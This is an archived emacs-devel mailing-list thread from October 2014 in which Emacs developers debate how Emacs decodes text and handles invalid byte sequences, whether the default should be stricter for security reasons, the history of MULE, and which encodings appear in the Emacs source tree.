^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-13 6:02 ` Eli Zaretskii @ 2014-10-13 8:24 ` Stephen J. Turnbull 2014-10-13 8:58 ` David Kastrup 2014-10-13 9:05 ` Eli Zaretskii 0 siblings, 2 replies; 404+ messages in thread From: Stephen J. Turnbull @ 2014-10-13 8:24 UTC (permalink / raw) To: Eli Zaretskii Cc: dak, rms, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier Eli Zaretskii writes: > There's also the case that the application was invoked on a remote > host, and its output is passed via the network (a.k.a. "Tramp"). Not > sure if those 3 cases cover that. My three cases were intended to cover the "local" case, where the user presumably has control of the files on her system. The case you are describing is covered under network streams as far as I'm concerned (YMMV, that's just the way I broke things down). > > An example of (3) is David's case, with AUCTeX handling of TeX error > > messages containing non-unibyte text.) AFAIK such applications are > > quite rare nowadays. > > "Rare" doesn't mean unimportant to users to the degree we can ignore > them. If we do want to cater to those "rare" cases, the only way of > doing that is maintain a database of programs and their behaviors. That's my main strategy, yes. We have `file-coding-system-alist' for filename cases, similar features for process and network streams, and individual modes such as AUCTeX are developed by hackers who have proved themselves able to take care of themselves. Emacs can also provide a way for individual users to opt out of the default validation mode persistently (eg, provide a global default variable and use novice mode for the opt-out). > Moreover, I don't think case (1) is as easy as you seem to think. Eli, I live in encoding hell, aka Japan, and have to deal with Chinese as well (Chinese students often use GB encodings to write Japanese). Please give me credit for extensive experience with not only broken implementations, but also bloodyminded standards bodies and users only half as witty as they think they are. Nevertheless, things are much better today than in the days when Erik Naggum declared that "Emacs has a fatal disease, and its name is 'MULE'". > In many cases, a file or a program that you think are "local" > really aren't. Just because a user thinks it local doesn't lower the risk associated with networks, although it may be somewhat lower than the open Internet. This is in the same risk class as other network streams. I suppose it would be reasonable to distinguish between Internet streams, local network streams (but only if a valid certificate was presented, otherwise there's little reason to be confident), and local files or processes. But doing that conveniently and accurately sounds like a painstaking task. > > I understand David and Eli to be of the opinion that in practice there > > is insignificant risk to Emacs or its users from any form of invalid > > or malicious input, from the network or local. I disagree. > > I never said anything like that. No, you didn't. I infer it from the policies for Emacs you advocate. > What I did say, and stand by, is that doing what you suggest is > certain to cause user outcry of the kind I remember very well. It won't. There may be outcry, but the world has changed dramatically from the times you remember, and the outcry will be different (except for users like yourself who were there at the time and will be upset by the "regression"[1]). > I think it's naive to assume that "this time it will be different"; > experience has taught me that this attitude is ill-advised. I don't assume it. I know for a fact that the world is much more hostile than it was back then, and I think other conditions have changed enough that it's time for another experiment, hopefully with a little bit of attention to design of user interfaces in advance. > We shouldn't do that out of our own initiative based on academic > considerations and examples from PHP or whatever. You think spam, viruses, phishing, buffer overrun exploits, and the like are "academic considerations"? They aren't, and the attitude that users can and should take care of themselves is *not* a selling point in this environment, except for developers who would rather not deal with complex APIs and worse, the finicky art of providing convenient, unobtrusive, and yet flexible UI. Footnotes: [1] And I hope that group is a tiny minority, given the rapid growth in computer usage in just that decade and a half. If it turns out that greybeards like us are the majority of users, that's a sad day for Emacs and for free software. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-13 8:24 ` Stephen J. Turnbull @ 2014-10-13 8:58 ` David Kastrup 2014-10-13 9:45 ` Stephen J. Turnbull 2014-10-13 9:05 ` Eli Zaretskii 1 sibling, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-10-13 8:58 UTC (permalink / raw) To: Stephen J. Turnbull Cc: rms, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii "Stephen J. Turnbull" <stephen@xemacs.org> writes: > Eli Zaretskii writes: > > > There's also the case that the application was invoked on a remote > > host, and its output is passed via the network (a.k.a. "Tramp"). Not > > sure if those 3 cases cover that. > > My three cases were intended to cover the "local" case, where the user > presumably has control of the files on her system. The case you are > describing is covered under network streams as far as I'm concerned > (YMMV, that's just the way I broke things down). > > > > An example of (3) is David's case, with AUCTeX handling of TeX error > > > messages containing non-unibyte text.) AFAIK such applications are > > > quite rare nowadays. > > > > "Rare" doesn't mean unimportant to users to the degree we can ignore > > them. If we do want to cater to those "rare" cases, the only way of > > doing that is maintain a database of programs and their behaviors. > > That's my main strategy, yes. We have `file-coding-system-alist' for > filename cases, similar features for process and network streams, and > individual modes such as AUCTeX are developed by hackers who have > proved themselves able to take care of themselves. But that's not what happens. AUCTeX uses the normal defaults. When those defaults prove _insufficient_ to do the trick (which happens in sub-percentages of the total) for finding the corresponding source in a (normally encoding-correct) buffer of characters by interpreting the error context messages on a terminal where byte-based linebreaks may corrupt characters, _then_ the error context message (which came in from a terminal with an encoding, so no byte stream exists any more) are reencoded to utf-8, the line break is removed, and the byte stream is redecoded and matched again to the source file buffer containing _characters_ in the same encoding as those used for decoding the terminal. So the point is that a) TeX daring to produce error output on its console does not cause beeps and interruptions b) I have a fallback strategy for dealing with that kind of "ugh" that is _not_ covered by the standard fallback strategies but that can be hand-implemented _because_ there was no information loss. The alternative would be to create an encoding utf-8-with-bad-linebreaks and the respective coders/recoders and have that as the terminal encoding for running TeX. And I have no doubt that people will say that I should be forced to go that path since it is the "correct" one. Except that a single TeX run may very well go across several files with _different_ encodings, so there really is no single "correct" encoding for the terminal messages of TeX. Which means that the current "don't mess with things you have not been told to mess with" behavior leaves the programmer in the situation to focus on the _actual_ problem rather than fighting Emacs' preconceptions about what problem he is allowed to encounter. > Nevertheless, things are much better today than in the days when Erik > Naggum declared that "Emacs has a fatal disease, and its name is > 'MULE'". Erik was the highest profile programmer/user abandoning Emacs for XEmacs in order to avoid the consequences of multibyte encodings. I seem to remember that he blamed the principle of multibyte encodings rather than the early buggy MULE implementations (the earliest implementations worked with byte offsets for buffer and string positions so there was wagonloads of fallout, but I think he also objected to the performance implications when closing that problem vector by making buffer and string positions character-based). I have no idea which Emacs variant he would be using these days if he were still around. It may well be XEmacs since part of his objections against MULE (which is now pretty unavoidable in XEmacs as well I _think_) was the manner of the top-down decision-making resulting in its early inclusion in Emacs when it was not all-that-ready. > I suppose it would be reasonable to distinguish between Internet > streams, local network streams (but only if a valid certificate was > presented, otherwise there's little reason to be confident), and local > files or processes. But doing that conveniently and accurately sounds > like a painstaking task. The only thing one case sensibly do in stacked problems like this is to have each level deal with its own problems. And that means that it needs to pass on data that is not being processed at its own level. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-13 8:58 ` David Kastrup @ 2014-10-13 9:45 ` Stephen J. Turnbull 2014-10-13 10:17 ` Uwe Brauer 2014-10-13 10:30 ` David Kastrup 0 siblings, 2 replies; 404+ messages in thread From: Stephen J. Turnbull @ 2014-10-13 9:45 UTC (permalink / raw) To: David Kastrup Cc: rms, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii David Kastrup writes: > The alternative would be to create an encoding > utf-8-with-bad-linebreaks and the respective coders/recoders and > have that as the terminal encoding for running TeX. Actually, Emacs *could* design a sane API where the error handler is specified separate from the encoding. This is *much* more important here than it was with the EOL convention. > > Nevertheless, things are much better today than in the days when > > Erik Naggum declared that "Emacs has a fatal disease, and its > > name is 'MULE'". > > Erik was the highest profile programmer/user abandoning Emacs for > XEmacs in order to avoid the consequences of multibyte encodings. If he did, I never heard about it. ISTR he hated XEmacs worse than he hated Mule. I know he stopped following the Emacs mainline, but AFAIK he either went to a Common Lisp implementation like Hemlock, or rolled his own based on a pre- Mule version of GNU Emacs, not XEmacs. > MULE (which is now pretty unavoidable in XEmacs as well I _think_) No, XEmacs built fine without Mule as of early summer. XEmacs 21.5 at least has limited ability to deal with Unicode without Mule, but I don't remember exactly how far it goes. It may be that you're stuck with Latin 1 characters as the internal repertoire, or it may be able to deal with Unicode UTFs as long as the stream is limited to a repertoire contained in a single unibyte character set. If the latter, you have to select fonts appropriately since such an XEmacs knows nothing about non-Unicode character sets other than ASCII. Of course if you want to deal sensibly with non-ASCII, you need to build XEmacs with Mule, but there are a lot of American programmers who don't need that even today. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-13 9:45 ` Stephen J. Turnbull @ 2014-10-13 10:17 ` Uwe Brauer 2014-10-13 10:30 ` David Kastrup 1 sibling, 0 replies; 404+ messages in thread From: Uwe Brauer @ 2014-10-13 10:17 UTC (permalink / raw) To: emacs-devel >> "Stephen" == Stephen J Turnbull <stephen@xemacs.org> writes: > Actually, Emacs *could* design a sane API where the error handler is > specified separate from the encoding. This is *much* more important > here than it was with the EOL convention. > If he did, I never heard about it. Istr he hated XEmacs worse than he > hated Mule. I know he stopped following the Emacs mainline, but AFAIK > he either went to a Common Lisp implementation like Hemlock, or rolled > his own based on a pre- Mule version of GNU Emacs, not XEmacs. He did not, I recall to have asked him explicitly (I don't remember in which context) and he said, he would never use Xemacs. He even published a remove-mule-from-emacs20-survival-kit. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-13 9:45 ` Stephen J. Turnbull 2014-10-13 10:17 ` Uwe Brauer @ 2014-10-13 10:30 ` David Kastrup 1 sibling, 0 replies; 404+ messages in thread From: David Kastrup @ 2014-10-13 10:30 UTC (permalink / raw) To: Stephen J. Turnbull Cc: rms, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii "Stephen J. Turnbull" <stephen@xemacs.org> writes: > David Kastrup writes: > > > The alternative would be to create an encoding > > utf-8-with-bad-linebreaks and the respective coders/recoders and > > have that as the terminal encoding for running TeX. > > Actually, Emacs *could* design a sane API where the error handler is > specified separate from the encoding. This is *much* more important > here than it was with the EOL convention. > > > > Nevertheless, things are much better today than in the days when > > > Erik Naggum declared that "Emacs has a fatal disease, and its > > > name is 'MULE'". > > > > Erik was the highest profile programmer/user abandoning Emacs for > > XEmacs in order to avoid the consequences of multibyte encodings. > > If he did, I never heard about it. ISTR he hated XEmacs worse than he > hated Mule. I know he stopped following the Emacs mainline, but AFAIK > he either went to a Common Lisp implementation like Hemlock, or rolled > his own based on a pre- Mule version of GNU Emacs, not XEmacs. At first glance, indeed I find <URL:http://www.emacswiki.org/ErikNaggum#toc1>, the "multibyte survival kit" for Emacs. Here's some discussion involving Erik Naggum and myself in 1997 about MULE and Emacs 20 <URL:https://groups.google.com/forum/#!topic/comp.emacs/ge7syiq7oy8>. Interesting historic read. Erik says in that thread "XEmacs has done this right: offer MULE as an option at build-time.". At any rate, it is funny to see that I propose using an array-of-characters programming model with underlying multibyte representation there, which is dismissed by Erik as not tenable. Of course, it is what we _have_ since about Emacs 20.3 or 20.4 or so. So at any rate: at a cursory search I find nothing supporting my statement about Erik and XEmacs, but some references that may explain the direction I misremember. I also find that I've been more involved with coding sanity issues than I remember. Though I am pretty sure not to the degree of contributing actual code. > > MULE (which is now pretty unavoidable in XEmacs as well I _think_) > > No, XEmacs built fine without Mule as of early summer. XEmacs 21.5 at > least has limited ability to deal with Unicode without Mule, but I > don't remember exactly how far it goes. It may be that you're stuck > with Latin 1 characters as the internal repertoire, or it may be able > to deal with Unicode UTFs as long as the stream is limited to a > repertoire contained in a single unibyte character set. If the > latter, you have to select fonts appropriately since such an XEmacs > knows nothing about non-Unicode character sets other than ASCII. > > Of course if you want to deal sensibly with non-ASCII, you need to > build XEmacs with Mule, but there are a lot of American programmers > who don't need that even today. Ok, so that state is basically like the situation Erik lauded XEmacs for. My personal impression is that the historical one-size-must-fit-all approach of Emacs has, after the initial pain it caused, led to a situation and code base that does a reasonable job at keeping the costs of versatility as well in check as can be expected. We don't have the "you should have been using other compilation options" argument to fall back on, so it better should. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-13 8:24 ` Stephen J. Turnbull 2014-10-13 8:58 ` David Kastrup @ 2014-10-13 9:05 ` Eli Zaretskii 2014-10-13 10:05 ` Stephen J. Turnbull 1 sibling, 1 reply; 404+ messages in thread From: Eli Zaretskii @ 2014-10-13 9:05 UTC (permalink / raw) To: Stephen J. Turnbull Cc: dak, rms, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier > From: "Stephen J. Turnbull" <stephen@xemacs.org> > Cc: dak@gnu.org, > rms@gnu.org, > handa@gnu.org, > mhw@netris.org, > dmantipov@yandex.ru, > emacs-devel@gnu.org, > mikegerwitz@gnu.org, > monnier@iro.umontreal.ca > Date: Mon, 13 Oct 2014 17:24:39 +0900 > > > We shouldn't do that out of our own initiative based on academic > > considerations and examples from PHP or whatever. > > You think spam, viruses, phishing, buffer overrun exploits, and the > like are "academic considerations"? How are these relevant to this discussion (well, except for the unspecified "and the like" part)? What do these have to do with text encoding and decoding in general, and with invalid byte sequences in particular? Let's stay focused on the topic at hand, OK? > They aren't, and the attitude that users can and should take care of > themselves is *not* a selling point in this environment, except for > developers who would rather not deal with complex APIs and worse, the > finicky art of providing convenient, unobtrusive, and yet flexible UI. All I said was that I want to hear about real-life experiences with these dangers, where the attackers were able to exploit the Emacs text decoding machinery to their advantage. I know it's probably possible to concoct a synthetic use case for that (although even that was not done in this thread), but I want to see _real-life_ stories. Then we will have specific scenarios to talk about, rather than general unnamed risks, and also won't need to argue about whether "this can happen". Historically, any real-life risks that were reported on the Emacs lists were handled and fixed very quickly and without any discussions as to whether they should be fixed. Rest assured that the same will happen with the kinds of risks discussed here -- if and when someone shows us a real-life use case where these risks materialize on our watch. We arrived at the current modus operandi of Emacs wrt text encoding and decoding through sweat, blood, and tears of several major releases. It is neither an incident nor luck that complaints about these issues are rarely if at all seen on the user support forums or here, for the past 2 major releases. Changing that in response to considerations not backed up by specific user reports would be a grave mistake. If the history of Emacs development since v20.1 in this area teaches us anything, it is that we, the Emacs developers, are not good enough in making these decisions based on theoretical arguments and considerations. Suit yourself, but I, for one, don't want us to make that mistake again, ever. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-13 9:05 ` Eli Zaretskii @ 2014-10-13 10:05 ` Stephen J. Turnbull 0 siblings, 0 replies; 404+ messages in thread From: Stephen J. Turnbull @ 2014-10-13 10:05 UTC (permalink / raw) To: Eli Zaretskii Cc: dak, rms, handa, mhw, dmantipov, emacs-devel, mikegerwitz, monnier Eli Zaretskii writes: > Historically, any real-life risks that were reported on the Emacs > lists were handled and fixed very quickly and without any discussions > as to whether they should be fixed. Fine. I prefer a more proactive approach, and I've explained why. You don't think the explanations make sense, no problem for me. ;-) ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-13 5:35 ` Stephen J. Turnbull 2014-10-13 6:02 ` Eli Zaretskii @ 2014-10-13 14:55 ` Paul Eggert 2014-10-13 17:18 ` Stephen J. Turnbull 2014-10-14 2:11 ` Richard Stallman 2 siblings, 1 reply; 404+ messages in thread From: Paul Eggert @ 2014-10-13 14:55 UTC (permalink / raw) To: emacs-devel Stephen J. Turnbull wrote: > The file or application is truly local, provided with the OS or > created by the user. In that case on a well-maintained system, > the encoding should be valid It could easily be mixed. For example, in the Emacs source code the output of the shell command "grep -r she *" produces some text that is UTF-8 and some that is 8-bit EUC. So the shell command's output is not valid even though all its input files are valid. This type of thing is not uncommon. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-13 14:55 ` Paul Eggert @ 2014-10-13 17:18 ` Stephen J. Turnbull 2014-10-13 17:24 ` David Kastrup 0 siblings, 1 reply; 404+ messages in thread From: Stephen J. Turnbull @ 2014-10-13 17:18 UTC (permalink / raw) To: Paul Eggert; +Cc: emacs-devel Paul Eggert writes: > Stephen J. Turnbull wrote: > > The file or application is truly local, provided with the OS or > > created by the user. In that case on a well-maintained system, > > the encoding should be valid > > It could easily be mixed. For example, in the Emacs source code > the output of the shell command "grep -r she *" produces some text > that is UTF-8 and some that is 8-bit EUC. So the shell command's > output is not valid even though all its input files are valid. > This type of thing is not uncommon. Not uncommon, but no more (and no less) sensible than "zgrep she /vmlinuz". Both commands are useful in some contexts, but neither command's output should be thought of as "encoded text" in the sense that any codec I know of can handle and produce useful output for all of the encodings (or even more than one). If you're planning further processing you shouldn't allow something as mechanical as a codec anywhere near that stuff: you should accept it into a buffer as binary, and do your own conversions based on any useful heuristics you have. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-13 17:18 ` Stephen J. Turnbull @ 2014-10-13 17:24 ` David Kastrup 2014-10-13 17:49 ` Stephen J. Turnbull 0 siblings, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-10-13 17:24 UTC (permalink / raw) To: emacs-devel "Stephen J. Turnbull" <stephen@xemacs.org> writes: > Paul Eggert writes: > > Stephen J. Turnbull wrote: > > > The file or application is truly local, provided with the OS or > > > created by the user. In that case on a well-maintained system, > > > the encoding should be valid > > > > It could easily be mixed. For example, in the Emacs source code > > the output of the shell command "grep -r she *" produces some text > > that is UTF-8 and some that is 8-bit EUC. So the shell command's > > output is not valid even though all its input files are valid. > > This type of thing is not uncommon. > > Not uncommon, but no more (and no less) sensible than "zgrep she > /vmlinuz". Both commands are useful in some contexts, but neither > command's output should be thought of as "encoded text" in the sense > that any codec I know of can handle and produce useful output for all > of the encodings (or even more than one). > > If you're planning further processing you shouldn't allow something as > mechanical as a codec anywhere near that stuff: you should accept it > into a buffer as binary, and do your own conversions based on any > useful heuristics you have. Binary is quite unpractical when you are working in a locale and the vast majority of output fits it. Then you want to have things displayed according to locale and have that stuff which doesn't fit formatted as some sort of recognizable escape sequence. And I am mighty glad that Emacs does that without some "if Emacs cannot be 100% correct it should at least be 100% inconvenient" rule getting in the way of getting work done. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-13 17:24 ` David Kastrup @ 2014-10-13 17:49 ` Stephen J. Turnbull 2014-10-13 18:04 ` David Kastrup 2014-10-13 19:19 ` Eli Zaretskii 0 siblings, 2 replies; 404+ messages in thread From: Stephen J. Turnbull @ 2014-10-13 17:49 UTC (permalink / raw) To: David Kastrup; +Cc: emacs-devel David Kastrup writes: > Binary is quite unpractical when you are working in a locale The Emacs source tree evidently doesn't *have* a locale in the relevant sense since it has multiple encodings. > and the vast majority of output fits it. Then you want to have > things displayed according to locale and have that stuff which > doesn't fit formatted as some sort of recognizable escape sequence. For Paul's example, I suppose binary would work just fine, since he's searching for ASCII and Emacs sources are probably over 95% ASCII. And in *my* locale, the whole locale concept sucks becaues no matter what locale I choose somewhere between 1/3 and 2/3 of the text (all perfectly intelligible Japanese) will be unreadable according to that locale. The real world is stranger and more dangerous than you imagine. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-13 17:49 ` Stephen J. Turnbull @ 2014-10-13 18:04 ` David Kastrup 2014-10-13 19:19 ` Eli Zaretskii 1 sibling, 0 replies; 404+ messages in thread From: David Kastrup @ 2014-10-13 18:04 UTC (permalink / raw) To: Stephen J. Turnbull; +Cc: emacs-devel "Stephen J. Turnbull" <stephen@xemacs.org> writes: > David Kastrup writes: > > > Binary is quite unpractical when you are working in a locale > > The Emacs source tree evidently doesn't *have* a locale in the > relevant sense since it has multiple encodings. > > > and the vast majority of output fits it. Then you want to have > > things displayed according to locale and have that stuff which > > doesn't fit formatted as some sort of recognizable escape sequence. > > For Paul's example, I suppose binary would work just fine, since he's > searching for ASCII and Emacs sources are probably over 95% ASCII. > > And in *my* locale, the whole locale concept sucks becaues no matter > what locale I choose somewhere between 1/3 and 2/3 of the text (all > perfectly intelligible Japanese) will be unreadable according to that > locale. And 100% illegible is better? > The real world is stranger and more dangerous than you imagine. Apparently. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-13 17:49 ` Stephen J. Turnbull 2014-10-13 18:04 ` David Kastrup @ 2014-10-13 19:19 ` Eli Zaretskii 2014-10-14 7:03 ` Stephen J. Turnbull 1 sibling, 1 reply; 404+ messages in thread From: Eli Zaretskii @ 2014-10-13 19:19 UTC (permalink / raw) To: Stephen J. Turnbull; +Cc: dak, emacs-devel > From: "Stephen J. Turnbull" <stephen@xemacs.org> > Date: Tue, 14 Oct 2014 02:49:56 +0900 > Cc: emacs-devel@gnu.org > > The Emacs source tree evidently doesn't *have* a locale in the > relevant sense since it has multiple encodings. That's not true: we try using UTF-8 wherever possible. The few files that don't use that simply cannot. But they are a tiny minority. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-13 19:19 ` Eli Zaretskii @ 2014-10-14 7:03 ` Stephen J. Turnbull 2014-10-14 7:41 ` Eli Zaretskii 2014-10-14 20:03 ` Paul Eggert 0 siblings, 2 replies; 404+ messages in thread From: Stephen J. Turnbull @ 2014-10-14 7:03 UTC (permalink / raw) To: Eli Zaretskii; +Cc: dak, emacs-devel Eli Zaretskii writes: > That's not true: we try using UTF-8 wherever possible. The few files > that don't use that simply cannot. That doesn't seem to be true. In fact many of the encodings discovered by "grep -r -e '-\\*- coding:" are ISO 2022 conformant, and a few indeed appear to be EUC encodings under an alias (eg, chinese-iso-8bit-unix). AFAICS, the only encodings listed that can't be encoded in UTF-8 are the Big 5 family -- and that's only if you demand bug-compatibility.[1] So "simply cannot" evidently is your way of saying "inconvenient".[2] Note that because of multiple encodings, in the Emacs tree "grep -r" is probably just a bug. It's not that you can't read the foreign languages in "wrong" encodings. Rather, if your search key is in one of those languages, you'll *miss occurances* in the "wrong" encodings. With your preferred default, most users will live their whole lives without recognizing the bug. With a strict default, they have a fighting chance of learning about it. Footnotes: [1] Big 5 contains a few duplicated characters (at different code points), so *as text* those files can be represented in Unicode (no text information is lost since the characters in question are identical in all ways except Big 5 code point), although *as binary files* they may not be roundtrippable to UTF-8 (it depends on which code point is chosen for the duplicated character). [2] The inconvenience is pretty significant, here: you'd lose diff'ability across the conversion boundary. Thus only new files are *required* to use UTF-8 (no diff discontinuity), and conversions of existing files are presumably done only with great care, if at all. Still, I would think the benefits of having these files be greppable (and etags-able!) would outweigh that inconvenience in a very short period of time (maybe a year?) Except for documentation files, the files that need these characters probably don't change much. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-14 7:03 ` Stephen J. Turnbull @ 2014-10-14 7:41 ` Eli Zaretskii 2014-10-14 7:58 ` Eli Zaretskii 2014-10-14 8:34 ` Stephen J. Turnbull 2014-10-14 20:03 ` Paul Eggert 1 sibling, 2 replies; 404+ messages in thread From: Eli Zaretskii @ 2014-10-14 7:41 UTC (permalink / raw) To: Stephen J. Turnbull; +Cc: dak, emacs-devel > From: "Stephen J. Turnbull" <stephen@xemacs.org> > Cc: dak@gnu.org, > emacs-devel@gnu.org > Date: Tue, 14 Oct 2014 16:03:42 +0900 > > Eli Zaretskii writes: > > > That's not true: we try using UTF-8 wherever possible. The few files > > that don't use that simply cannot. > > That doesn't seem to be true. In fact many of the encodings > discovered by "grep -r -e '-\\*- coding:" are ISO 2022 conformant, and > a few indeed appear to be EUC encodings under an alias (eg, > chinese-iso-8bit-unix). AFAICS, the only encodings listed that can't > be encoded in UTF-8 are the Big 5 family -- and that's only if you > demand bug-compatibility.[1] First, you missed the file-local variables (the pattern you used with Grep will only find the cookies on the first line). Second, you missed file-coding-system-alist, auto-coding-alist, and auto-coding-regexp-alist, which set defaults for some files that therefore no longer need to be explicitly stated in the file. So please believe me when I say that the files encoded in anything that isn't UTF-8 are those where using UTF-8 was impossible for some specific reason (not the reasons you mention above). You can look up the related discussions in our list archives. Btw, to find out how many of our files are in UTF-8 and how many aren't, I would suggest to use tools that can explicitly tell the encoding, rather than rely on Grep and on whatever you remember are the ways of specifying a file's encoding. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-14 7:41 ` Eli Zaretskii @ 2014-10-14 7:58 ` Eli Zaretskii 2014-10-14 10:06 ` Stephen J. Turnbull 2014-10-14 8:34 ` Stephen J. Turnbull 1 sibling, 1 reply; 404+ messages in thread From: Eli Zaretskii @ 2014-10-14 7:58 UTC (permalink / raw) To: stephen, dak; +Cc: emacs-devel > Date: Tue, 14 Oct 2014 10:41:56 +0300 > From: Eli Zaretskii <eliz@gnu.org> > Cc: dak@gnu.org, emacs-devel@gnu.org > > So please believe me when I say that the files encoded in anything > that isn't UTF-8 are those where using UTF-8 was impossible for some > specific reason (not the reasons you mention above). You can look up > the related discussions in our list archives. Here's the discussion I had in mind: http://lists.gnu.org/archive/html/bug-gnu-emacs/2013-03/msg00420.html ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-14 7:58 ` Eli Zaretskii @ 2014-10-14 10:06 ` Stephen J. Turnbull 0 siblings, 0 replies; 404+ messages in thread From: Stephen J. Turnbull @ 2014-10-14 10:06 UTC (permalink / raw) To: Eli Zaretskii; +Cc: dak, emacs-devel Eli Zaretskii writes: > Here's the discussion I had in mind: > > http://lists.gnu.org/archive/html/bug-gnu-emacs/2013-03/msg00420.html Oh, that's rich: The same can be said for etc/tutorials/TUTORIAL.ja. This file should be shown in a proper Japanese font even for a user not in Japanese lang. env. With all due respect, Dr. Handa, that is quite ironic. You know as well as I do what every Japanese textbook does to Chinese poetry. Technically speaking, this kind of font choice is better done with metadata. For example, the user's default fonts might not make a clear distinction among the different styles, or might be very unrepresentative of one or more languages' typical style. The fact that Emacs *can* do it based on character set is kinda silly nowadays because *nobody else* does. The effort would be better spent on improving CSS support. And this again is amusing: CJK variety: GB(元气,开发), BIG5(元氣,開發), JIS(元気,開発), KSC(元氣,開發) I know[1] that there are consistent font style differences between each pair of coding systems above, and those are nice to have. But what is funny is that *mostly those are not glyph differences in the same character across languages, those are different characters in Unicode!* (Those are not 4 characters represented in 4 different coding systems: there are at least 8 different characters involved. And all but 2 of them are in fact representable in that venerable subset of the Japanese standard, JIS X 0208.) So, yes, I suppose that there are minor technical issues (I note that TUTORIAL.ja didn't round-trip -- which is odd, and "CJK variety" obviously can't). But the assertions that these files "shouldn't" converted to UTF-8 because the differences "cannot" be represented in UTF-8 are primarily artistic, and a point of view with which many users differ. (Besides the practice of the Japanese Ministry of Education, Culture, etc, mentioned above, my Chinese students often prefer to use Chinese fonts for their Japanese papers because they are "more readable", for example -- of course, they need to fix that when they hand them in to Japanese professors, who find the Chinese fonts "unreadable" -- and so it goes.) Footnotes: [1] I'm working in a TTY so I can't see them at the moment. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-14 7:41 ` Eli Zaretskii 2014-10-14 7:58 ` Eli Zaretskii @ 2014-10-14 8:34 ` Stephen J. Turnbull 2014-10-14 9:21 ` Eli Zaretskii 1 sibling, 1 reply; 404+ messages in thread From: Stephen J. Turnbull @ 2014-10-14 8:34 UTC (permalink / raw) To: Eli Zaretskii; +Cc: dak, emacs-devel Eli Zaretskii writes: > > > That's not true: we try using UTF-8 wherever possible. The few files > > > that don't use that simply cannot. > > > > That doesn't seem to be true. In fact many of the encodings > > discovered by "grep -r -e '-\\*- coding:" are ISO 2022 conformant, and > > a few indeed appear to be EUC encodings under an alias (eg, > > chinese-iso-8bit-unix). AFAICS, the only encodings listed that can't > > be encoded in UTF-8 are the Big 5 family -- and that's only if you > > demand bug-compatibility.[1] > > First, you missed the file-local variables (the pattern you used with > Grep will only find the cookies on the first line). So? That's not a bug, since I only need to show existence of files that use coding systems that *could* be translated to UTF-8 but weren't. I'm aware that not every file in a non-default encoding will have such a cookie, and that the cookies may be mistaken, of course. > Btw, to find out how many of our files are in UTF-8 and how many > aren't, I would suggest to use tools that can explicitly tell the > encoding, rather than rely on Grep and on whatever you remember are > the ways of specifying a file's encoding. Sure, but it's ironic that *you* are saying that to *me*, when you're on the side saying that if you get the wrong encoding somehow you want rawbytes. Shouldn't you use tools that can explicitly tell you the encoding? ;-) ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-14 8:34 ` Stephen J. Turnbull @ 2014-10-14 9:21 ` Eli Zaretskii 0 siblings, 0 replies; 404+ messages in thread From: Eli Zaretskii @ 2014-10-14 9:21 UTC (permalink / raw) To: Stephen J. Turnbull; +Cc: dak, emacs-devel > From: "Stephen J. Turnbull" <stephen@xemacs.org> > Cc: dak@gnu.org, > emacs-devel@gnu.org > Date: Tue, 14 Oct 2014 17:34:38 +0900 > > Eli Zaretskii writes: > > > > > That's not true: we try using UTF-8 wherever possible. The few files > > > > that don't use that simply cannot. > > > > > > That doesn't seem to be true. In fact many of the encodings > > > discovered by "grep -r -e '-\\*- coding:" are ISO 2022 conformant, and > > > a few indeed appear to be EUC encodings under an alias (eg, > > > chinese-iso-8bit-unix). AFAICS, the only encodings listed that can't > > > be encoded in UTF-8 are the Big 5 family -- and that's only if you > > > demand bug-compatibility.[1] > > > > First, you missed the file-local variables (the pattern you used with > > Grep will only find the cookies on the first line). > > So? That's not a bug, since I only need to show existence of files > that use coding systems that *could* be translated to UTF-8 but > weren't. My original statement was that we try using UTF-8 "whenever possible". I didn't define "possible", but the discussion to which I pointed has the necessary details for that. I also said that the non-UTF-8 files are a minority; for that, counting the UTF-8 encoded files without missing any, no matter how their encoding is determined, is important. > > Btw, to find out how many of our files are in UTF-8 and how many > > aren't, I would suggest to use tools that can explicitly tell the > > encoding, rather than rely on Grep and on whatever you remember are > > the ways of specifying a file's encoding. > > Sure, but it's ironic that *you* are saying that to *me*, when you're > on the side saying that if you get the wrong encoding somehow you want > rawbytes. Shouldn't you use tools that can explicitly tell you the > encoding? ;-) Irrelevant. The issue to which you responded was whether the majority of files in the Emacs repository use a certain encoding, which would thus constitute a kind of "de-facto locale" for Emacs files. ^ permalink raw reply [flat|nested] 404+ messages in thread
